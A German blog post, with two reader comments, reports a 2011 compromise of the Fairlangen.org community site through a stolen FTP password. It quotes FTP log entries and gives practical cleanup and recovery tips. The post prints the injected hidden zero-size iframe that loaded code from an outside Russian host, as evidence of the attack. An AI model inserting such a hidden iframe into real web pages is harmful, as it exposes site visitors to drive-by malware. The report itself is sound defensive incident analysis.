In unserer Gemeinde betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org. Dabei geht es darum sich darüber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. Über Wege, die mir noch nicht klar sind, hat ein Bösewicht Zugang zu dem FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem bösartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite "index.php". Einem Menschen wäre sicher sofort aufgefallen, dass die index.htm und index.html nur über einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.
Einen der Log-Einträge habe ich bereits vorher erklärt (ist nur an zwei Stellen anonymisiert):
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c
Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (174.37.220.147 sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):
<iframe src="http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==" width="0" height="0" frameborder="0"></iframe>
Aus naheliegenden Gründen habe ich nicht ausprobiert, was dieser fremde Link für Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite würde nämlich sehr schnell von einschlägigen Seiten als bösartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite.
Nach der Änderung aller Passwörter (und dem Eintragen der DB-Passwörter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als wäre die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich sämtliche Software darauf aktualisiert, das war ohnehin fällig.
Aus der Erfahrung meine Tipps in der Situation:
- cool bleiben und nichts einfach löschen
- Die Domäne einfach mal in ein leeres Unterverzeichnis umleiten oder wenigstens die Index-Seiten als erstes einfach mal umbenennen, um die Leser mit älteren Browsern, die nicht warnen, zu schützen.
- Das FTP-Passwort ändern.
- Wenn genug Bandbreite da ist (sehr zu empfehlen): Den aktuellen, verseuchten Stand lokal sichern, sonst nur die infizierten Dateien separat speichern.
- Mittels einen DIFF-Tool, wie bspw. BeyondCompare (billig und gut) den aktuellen Stand auf dem Webserver mit der letzten lokalen Sicherung vergleichen und die betroffenen Dateien ermitteln.
- Die Log-Dateien sichten, bei uns wurde ich schnell im FTP-Log fündig.
- Mit der letzten Sicherung zurück setzen.
- Alle Passwörter ändern, die in irgendwelchen Dateien stehen, selbst wenn die Dateien nicht per FTP herunter geladen wurden. Ein Bösling könnte sie auch per PHP zippen und dann als Zip runter laden. Ich persönlich wurde das auch tun, wenn ich in den Logs genau sehen kann, dass sonst nicht weiter herunter geladen wurde.
- Domäne wieder auf den nun sauberen Stand umleiten und nötigenfalls Updates aller Software einspielen.
- Google, Firefox, etc davon überzeugen, dass wir wieder zu den Guten gehören.
Das Timing war übrigens perfekt: Der eigentliche Betreuer in Urlaub, mein griffbereites letztes Backup Monate alt, Ostern, schönes Wetter, …
Hallo Thomas,
wie hast du Google und dem Browser beigebracht, dass die Seite keine böse mehr ist?
Ich steht seit Ende letzten Jahres vor solch einem Problem. Ich habe einen Bekannten, der einen Online-Shop mit OSCommerce betreibt. Irgendwann um diese Zeit rum gab es eine Sicherheitslücke und ein paar Spaßvögel haben in dem Shop ähnliches Ungeziefer wie auf deiner oben beschriebenen Seite hinterlassen.
Da der Shop sowieso neu gemacht werden sollte, habe ich alle Dateien gelöscht und die Domain somit freigemacht. Nun melde ich Google in unregelmäßigen Abständen, dass sie die Seite erneut überprüfen und "freigeben" sollen, aber es tut sich nichts. Es kommt immer noch die Meldung, dass sie Bösartig sei. 🙁
Hallo Carsten,
es klappte bei mir weil die vorher befallenen Seiten wenigstens zum größten Teil noch da waren, aber eben "clean". Ich kann mir nicht vorstellen, dass jemand diese Kontrollen manuell durchführt. Falls Deine Seite nun völlig leer ist, klappt offenbar der Vergleich vorher<>nachher nicht. Oder sie erkennen einfach nicht, dass das Deine Seite ist. Dazu musste ich erst den HTML-Code verändern, um mich als Admin zu authentifizieren.
Falls sie aber nicht leer ist, könnte es ja wirklich sein, dass noch ein Problem besteht. Das sollte Dir dann aber der Problembericht offenbaren.
Viele Grüße
Thomas